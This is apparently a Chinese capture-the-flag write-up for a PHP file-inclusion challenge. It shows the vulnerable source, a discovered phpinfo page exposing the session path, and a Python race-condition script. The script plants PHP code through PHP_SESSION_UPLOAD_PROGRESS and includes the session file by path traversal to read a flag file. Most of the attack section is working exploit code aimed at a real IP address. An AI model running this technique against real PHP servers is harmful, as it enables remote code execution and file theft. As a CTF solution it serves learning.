<?phphighlight_file(__FILE__);echo "your flag is in some file in /etc ";$fielf=$_POST["field"];$cf="/tmp/app_auth/cfile/".$_POST['cf'];if(file_exists($cf)){include $cf;echo $$field;exit;}else{echo "";exit;}?> your flag is in some file in /etc
刚开始看还以为是出题的变量名字打错了,然后半天也不改,而且还有人做出来了,但看了半天只有一个任意文件读取漏洞,以为不能扫描就没碰,进度一度陷入僵局。
后来尝试扫了一下,结果扫出来一个you_can_seeeeeeee_me.php,访问后发现是phpinfo的信息。一点一点看各种信息,最终看到一个session.save_path=/var/lib/php/sessions/caefcfedje,结合源码的include,觉得这里应该是能利用的点,上网找了下脚本,成功命令执行:
import ioimport sysimport requestsimport threadingsessid = 'Qftm'def POST(session):while True:f = io.BytesIO(b'a' * 1024 * 50)session.post('http://124.70.48.235:20781/',data={"PHP_SESSION_UPLOAD_PROGRESS": "<?php var_dump(file_get_contents('/etc/fifeahbegc/hbcceebeje/dhdcbbdjcd/babeechfba/fifhdabccd/fl444444g'));?>"},files={"file": ('q.txt', f)},cookies={'PHPSESSID': sessid})def READ(session):while True:response = session.post('http://124.70.48.235:20781/', data={"cf": f"../../../../../../../../var/lib/php/sessions/caefcfedje/sess_{sessid}"})# print('[+++]retry')# print(response.text)print(response.text)sys.exit(0)with requests.session() as session:t1 = threading.Thread(target=POST, args=(session, ))t1.daemon = Truet1.start()READ(session)
若有收获,就点个赞吧
0 人点赞
